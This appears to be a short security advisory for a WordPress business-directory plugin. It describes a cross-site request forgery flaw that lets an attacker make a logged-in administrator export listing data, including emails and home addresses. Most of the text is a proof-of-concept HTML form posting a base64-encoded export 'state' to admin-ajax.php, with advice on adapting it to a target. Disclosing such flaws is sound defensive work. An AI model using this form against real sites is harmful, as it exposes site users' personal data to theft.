The plugin suffered from a Cross-Site Request Forgery issue, allowing an attacker to make a logged in administrator export files, which could then be downloaded by the attacker to get access to PII, such as email, home addresses etc
<html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="wpbdp-csv-export" /> <input type="hidden" name="state" value="eyJzZXR0aW5ncyI6eyJ0YXJnZXQtb3MiOiJtYWNvcyIsImNzdi1maWxlLXNlcGFyYXRvciI6Ilx0IiwiaW1hZ2VzLXNlcGFyYXRvciI6IjsiLCJjYXRlZ29yeS1zZXBhcmF0b3IiOiI7IiwidGVzdC1pbXBvcnQiOmZhbHNlLCJleHBvcnQtaW1hZ2VzIjpmYWxzZSwiaW5jbHVkZS11c2VycyI6IjEiLCJnZW5lcmF0ZS1zZXF1ZW5jZS1pZHMiOmZhbHNlLCJsaXN0aW5nX3N0YXR1cyI6ImFsbCIsImluY2x1ZGUtZXhwaXJhdGlvbi1kYXRlIjoiMSJ9LCJjb2x1bW5zIjpbImxpc3RpbmdfdGl0bGUiLCJsaXN0aW5nX2NhdGVnb3J5Iiwic2hvcnRfZGVzY3JpcHRpb24iLCJkZXNjcmlwdGlvbiIsIndlYnNpdGUiLCJwaG9uZSIsImVtYWlsIiwibGlzdGluZ190YWdzIiwiYWRkcmVzcyIsInppcF9jb2RlIiwic2NyaXB0YWxlcnR4c3MtMXNjcmlwdCIsInVzZXJuYW1lIiwiZmVlX2lkIiwiZXhwaXJlc19vbiJdLCJ3b3JraW5nZGlyIjoiXC92YXJcL3d3d1wvd29yZHByZXNzXC93cC1jb250ZW50XC91cGxvYWRzXC93cGJkcC1jc3YtZXhwb3J0c1wvNjA3MTc0M2M0MDc0MVwvIiwibGlzdGluZ3MiOls2NzVdLCJleHBvcnRlZCI6MCwiZmlsZXNpemUiOjAsImRvbmUiOmZhbHNlfQ==" /> <input type="submit" value="Submit request" /> </form> </body> </html> The state is base64 encoded and will need to be adapted to the target (the workingdir filed can also be set to an arbitrary existing location)
0xB9
0xB9
Yes
2021-04-12 (about 1 years ago)
2021-04-12 (about 1 years ago)
2021-04-14 (about 1 years ago)